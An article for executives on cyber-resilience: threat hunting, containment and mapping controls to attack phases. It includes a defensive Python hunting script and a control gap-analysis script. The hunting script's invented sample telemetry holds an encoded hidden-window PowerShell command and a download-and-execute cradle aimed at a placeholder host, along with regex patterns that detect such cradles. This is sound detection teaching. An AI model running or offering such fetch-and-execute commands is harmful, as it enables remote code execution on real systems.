Few organizations can confidently say that they will never be hacked, and those that do probably shouldn’t. As a result, security strategies are shifting from cyber-prevention to cyber-resilience. In plain terms, resilience means two things: the controls you have in place make you difficult and expensive to attack, and if you are breached anyway, you have the processes in place to detect it, contain it and recover quickly.
There are two questions that all CXOs have on their minds when it comes to cyber-resilience.
1. How do I know if we have been compromised?
Attackers are getting better by the day, and industry breach studies have for years put the average time to discover a compromise at around 200 days. Four steps help shorten that window:
- Do your research. Understand who is targeting you, and how, so you can proactively defend yourself.
- Perform a compromise assessment. Engage a specialist threat-hunting organization to review your environment for evidence that an attacker is already inside, not just for the presence of common threats. The output should be a list of suspicious findings to investigate, plus the telemetry gaps that prevented them from reviewing parts of the environment.
- Perform threat hunting and red teaming exercises. Hunt proactively and regularly, using the MITRE ATT&CK framework as a guide, for the tactics, techniques and procedures (TTPs) your likely adversaries use and for their known Indicators of Compromise (IOCs). Note that ATT&CK catalogues behaviours, not IOCs: a file hash or IP address changes the moment an attacker recompiles a tool or moves infrastructure, whereas a behaviour such as an Office application spawning PowerShell persists across campaigns, so hunts built on behaviour catch what IOC matching misses. Red team exercises then test whether those hunts and your monitoring actually detect a realistic intrusion.
- Monitor the dark web and obtain targeted threat intelligence. Stolen data and credentials frequently surface on dark-web markets, forums and leak sites, sometimes before the victim knows it has been breached. Keeping a watching brief for your data, domains and employee credentials there can be the first indication of a breach.
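Threat hunting on behaviour versus on IOCs, as an added example that is not part of the original article: the script below runs a small hunt over four constructed process-creation events (field names follow the Sysmon Event ID 1 layout, values are invented) using a constructed IOC hash list and three behavioural rules labelled with their ATT&CK technique IDs. In the sample, one event is caught only by its hash and two are caught only by their behaviour, which is the point: an IOC-only hunt would have missed the two events that look most like a phishing intrusion.

```python
"""Minimal threat-hunting pass over process-creation events.

Added example, not from the original article. The events, hashes and rules
are constructed for illustration; field names follow Sysmon Event ID 1
(Image, ParentImage, CommandLine, Hashes) but every value is invented.
"""
import re

# Constructed sample telemetry: four process-creation events.
SAMPLE_EVENTS = [
    {   # benign: service host started by the service control manager
        "Image": r"C:\Windows\System32\svchost.exe",
        "ParentImage": r"C:\Windows\System32\services.exe",
        "CommandLine": "svchost.exe -k netsvcs",
        "Hashes": "SHA256=1111111111111111111111111111111111111111111111111111111111111111",
    },
    {   # macro-laden document spawning hidden, encoded PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
        "Hashes": "SHA256=2222222222222222222222222222222222222222222222222222222222222222",
    },
    {   # dropped binary whose hash is on the (constructed) IOC list
        "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "update.exe",
        "Hashes": "SHA256=deadbeef00000000000000000000000000000000000000000000000000000000",
    },
    {   # no IOC match at all, but a download cradle launched from the mail client
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\"",
        "Hashes": "SHA256=3333333333333333333333333333333333333333333333333333333333333333",
    },
]

# Constructed IOC list: atomic indicators (file hashes) only.
KNOWN_BAD_SHA256 = {
    "deadbeef00000000000000000000000000000000000000000000000000000000",
}

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def parse_hashes(field):
    """Turn Sysmon's 'SHA256=...,MD5=...' string into a dict keyed by algorithm."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().upper()] = value.strip().lower()
    return out


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Behavioural rules keyed by ATT&CK technique IDs. Each predicate sees one event.
TTP_RULES = [
    ("T1566.001", "Office application spawning a script host",
     lambda e: basename(e["ParentImage"]) in OFFICE_PARENTS
     and basename(e["Image"]) in SCRIPT_HOSTS),
    ("T1059.001", "PowerShell with encoded or hidden-window command",
     lambda e: basename(e["Image"]) in ("powershell.exe", "pwsh.exe")
     and re.search(r"(?i)(^|\s)-(e|ec|enc|encodedcommand|w hidden)\b", e["CommandLine"]) is not None),
    ("T1105", "PowerShell download cradle",
     lambda e: basename(e["Image"]) in ("powershell.exe", "pwsh.exe")
     and re.search(r"(?i)downloadstring|downloadfile|invoke-webrequest|iwr\s", e["CommandLine"]) is not None),
]


def hunt(events, known_bad=KNOWN_BAD_SHA256, rules=TTP_RULES):
    """Return one (event index, kind, label) hit per match; kind is 'ioc' or 'ttp'."""
    hits = []
    for idx, ev in enumerate(events):
        sha = parse_hashes(ev.get("Hashes", "")).get("SHA256")
        if sha in known_bad:
            hits.append((idx, "ioc", "SHA256 on IOC list"))
        for tech, label, pred in rules:
            if pred(ev):
                hits.append((idx, "ttp", f"{tech} {label}"))
    return hits


def summarize(hits):
    """Split flagged events into those an IOC-only hunt would catch, miss, or both."""
    ioc_events = {i for i, kind, _ in hits if kind == "ioc"}
    ttp_events = {i for i, kind, _ in hits if kind == "ttp"}
    return {
        "ioc_only": ioc_events - ttp_events,
        "ttp_only": ttp_events - ioc_events,
        "both": ioc_events & ttp_events,
    }


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for idx, kind, label in found:
        print(f"event {idx}: [{kind}] {label}")
    print(summarize(found))
```

The rules are deliberately coarse; in production you would tune them against your own baseline (a software-deployment tool that legitimately runs encoded PowerShell, for instance) and track which ATT&CK techniques you have no rule for at all, which is itself a coverage gap.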
When a breach is detected, containment and recovery are the next steps. Containment ranges from isolating a single affected host to disconnecting an entire network segment or environment, depending on how far the compromise has spread. Recovery likewise ranges from removing a single infection to a complete rebuild of systems from known-good backups, depending on severity. During both phases, preserve evidence (disk and memory images, logs and the malware itself) before systems are wiped or rebuilt: you will need it for root-cause analysis, to be confident the attacker has actually been evicted, and if you want to prosecute the perpetrators.
2. How do I stop us from being compromised?
Cover the basics. Discover and classify data: know where your data is, classify it by criticality and secure it accordingly. As a starting point, review the Essential Eight mitigation strategies published by the Australian Cyber Security Centre, understand what each one is, and assess your environment against them. The ACSC also defines maturity levels for each strategy, so you can measure how well each is implemented rather than just whether it exists. Address any that are missing immediately.
Take an attack-based approach to security. To protect yourself from attacks you need to understand the stages of a common attack and how you can apply controls at each stage. A common attack chain, in sequential order, is: an email-based attack (phishing), malware delivery and execution, takeover of the local machine, privilege escalation and data exfiltration. This is a simplification (real intrusions typically also include steps such as persistence and lateral movement between machines), but it is enough to structure the exercise. Controls in a cybersecurity context generally fall into four categories: Predict, Protect, Detect and Respond.
Look at each step in the attack chain and, for each step, apply controls from each of the four categories. Layering controls this way is commonly known as defense in depth: no single control failure lets the attack run to completion. The simplest way to do this is a table with the attack phases as rows and the control categories as columns; in each cell, list the controls you already have. Any empty cell is a gap and should be addressed urgently. As you do this gap analysis, do not forget controls for people and processes, physical security, disaster recovery and third parties. Mapping your controls to an adversary’s attack methodology is one of the most effective ways to stop the attack before it reaches its objective.
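The control-mapping table described above, as an added example that is not part of the original article: the script below builds the matrix of attack phases against the four control categories, lists every empty cell as a gap, and orders the phases by how poorly they are covered. The phases and categories are the ones the article names; the controls placed in each cell are constructed placeholders to illustrate the exercise, not a recommended control set.

```python
"""Control-mapping gap analysis: attack phases x control categories.

Added example, not from the original article. The phase and category names
come from the article; the control inventory below is constructed for
illustration only.
"""

ATTACK_PHASES = [
    "Email-based attack",
    "Malware injection",
    "Local machine takeover",
    "Privilege escalation",
    "Data exfiltration",
]
CONTROL_CATEGORIES = ["Predict", "Protect", "Detect", "Respond"]

# Constructed inventory: (phase, category) -> controls currently in place.
# Cells with no entry are gaps.
CURRENT_CONTROLS = {
    ("Email-based attack", "Predict"): ["phishing-themed threat intel feed"],
    ("Email-based attack", "Protect"): ["mail gateway attachment sandboxing", "SPF/DKIM/DMARC"],
    ("Email-based attack", "Detect"): ["user-reported phishing button"],
    ("Email-based attack", "Respond"): ["mailbox purge playbook"],
    ("Malware injection", "Protect"): ["application control (allow-listing)", "Office macro blocking"],
    ("Malware injection", "Detect"): ["EDR"],
    ("Local machine takeover", "Protect"): ["OS and application patching"],
    ("Local machine takeover", "Detect"): ["EDR"],
    ("Local machine takeover", "Respond"): ["host isolation via EDR"],
    ("Privilege escalation", "Protect"): ["restricted admin privileges", "LAPS"],
    ("Data exfiltration", "Protect"): ["egress proxy with category blocking"],
}


def find_gaps(controls, phases=ATTACK_PHASES, categories=CONTROL_CATEGORIES):
    """Return every (phase, category) cell that has no control in place."""
    return [(p, c) for p in phases for c in categories if not controls.get((p, c))]


def gaps_by_phase(controls, phases=ATTACK_PHASES, categories=CONTROL_CATEGORIES):
    """Number of empty cells per attack phase."""
    counts = {p: 0 for p in phases}
    for p, _ in find_gaps(controls, phases, categories):
        counts[p] += 1
    return counts


def prioritized_phases(controls, phases=ATTACK_PHASES, categories=CONTROL_CATEGORIES):
    """Phases ordered worst-covered first; ties keep attack-chain order so the
    earlier stage (where stopping the attack prevents everything after it) comes first."""
    counts = gaps_by_phase(controls, phases, categories)
    return sorted(phases, key=lambda p: -counts[p])


def coverage_table(controls, phases=ATTACK_PHASES, categories=CONTROL_CATEGORIES):
    """Render the matrix as plain text, marking empty cells with GAP."""
    width = max(len(p) for p in phases)
    header = " " * width + " | " + " | ".join(f"{c:<8}" for c in categories)
    lines = [header, "-" * len(header)]
    for p in phases:
        cells = []
        for c in categories:
            n = len(controls.get((p, c), []))
            label = "GAP" if n == 0 else f"{n} ctrl"
            cells.append(f"{label:<8}")
        lines.append(f"{p:<{width}} | " + " | ".join(cells))
    return "\n".join(lines)


if __name__ == "__main__":
    print(coverage_table(CURRENT_CONTROLS))
    print()
    print("Address in this order:", prioritized_phases(CURRENT_CONTROLS))
    for phase, category in find_gaps(CURRENT_CONTROLS):
        print(f"GAP: no {category} control for '{phase}'")
```

A real inventory should also record the owner and evidence for each control, so that an entry in a cell means "verified working" rather than "we bought a product"; otherwise the table overstates coverage.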
Get strategic. The advice so far has been purely tactical. Threats will evolve and get worse. The only way to truly protect yourself is to conduct a robust risk analysis of your environment against a recognized framework such as ISO 27001 or the NIST Cybersecurity Framework, and address the issues it finds. Start with a simple health check. Understand your vulnerabilities and address them methodically. Then rinse and repeat: the threat landscape and your environment will constantly change, so to stay on top of new and emerging threats you have to remain vigilant and reassess your risks regularly.
In addition, engage in intelligence-led security. Simply put, this means obtaining relevant intelligence about the threats and vulnerabilities that apply to your environment and your sector, and using it to decide which defences to prioritize.
Unfortunately, there are no silver bullets in cybersecurity. The best you can do is become cyber-resilient. The good news is that these steps will put your organization in a better position to deal with the threats of tomorrow.